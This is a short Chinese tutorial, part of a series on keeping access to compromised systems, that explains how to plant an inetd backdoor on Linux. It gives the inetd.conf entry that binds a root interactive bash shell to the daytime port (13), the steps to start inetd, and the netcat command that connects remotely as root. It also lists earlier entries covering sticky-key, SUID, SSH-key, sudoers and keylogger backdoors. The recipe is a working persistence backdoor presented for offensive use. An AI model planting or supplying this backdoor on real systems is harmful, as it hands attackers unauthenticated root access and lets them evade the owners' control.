操作系统权限维持（十五）之Linux系统-inetd远程后门

系列文章

操作系统权限维持（一）之Windows系统-粘贴键后门
操作系统权限维持（二）之Windows系统-克隆账号维持后门
操作系统权限维持（三）之Windows系统-启动项维持后门
操作系统权限维持（四）之Windows系统-计划任务维持后门
操作系统权限维持（五）之Windows系统-系统服务维持后门
操作系统权限维持（六）之Linux系统-定时任务后门
操作系统权限维持（七）之Linux系统-SUID后门
操作系统权限维持（八）之Linux系统-SSHKey后门
操作系统权限维持（九）之Linux系统-添加用户后门
操作系统权限维持（十）之Linux系统-SSH 软连接后门
操作系统权限维持（十一）之Linux系统-SSH Wrapper后门
操作系统权限维持（十二）之Linux系统-sudoers利用后门
操作系统权限维持（十三）之Linux系统- SSH Keylogger记录密码后门
操作系统权限维持（十四）之Linux系统- Strace监听SSH来源流量记录密码后门

inetd远程后门

inetd，也叫作“超级服务器”，就是监视一些网络请求的守护进程，其根据网络请求来调用相应的服务进程来处理连接请求。

inetd.conf则是inetd的配置文件。inetd.conf文件告诉inetd监听哪些网络端口，为每个端口启动哪个服务。

位置是/etc/inetd.conf 配置格式：[servicename] [socktype] [proto] [flags] [user] [server_path] [args] 在配置文件下写入以下内容：

daytime stream tcp nowait root /bin/bash bash -i

daytime服务（13端口） 套接字类型 协议类型 不等待  用户组     提供服务的程序
daytime             stream   tcp     nowait root     /bin/bash bash -i

首先我们编辑该文件，向文件中写入上诉的命令

vim /etc/inetd.conf

然后我们输入

inetd

启动服务

这样配置好了以后利用以下命令远程连接直接能拿到root用户身份

nc targetIP 13